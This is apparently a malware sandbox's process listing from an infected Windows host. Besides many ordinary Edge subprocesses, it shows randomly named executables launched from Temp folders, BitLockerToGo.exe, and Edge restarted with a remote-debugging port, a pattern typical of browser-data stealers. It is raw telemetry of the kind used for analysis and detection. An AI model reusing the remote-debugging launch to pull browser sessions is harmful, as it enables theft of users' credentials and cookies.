"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2848 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4552 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe

"C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2320 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2796 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3300 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3296 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2448 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3840 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3936 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2444 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4448 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2676 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2672 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2232 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3304 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3312 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3312 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4236 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4332 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2788 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2792 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2792 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3348 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

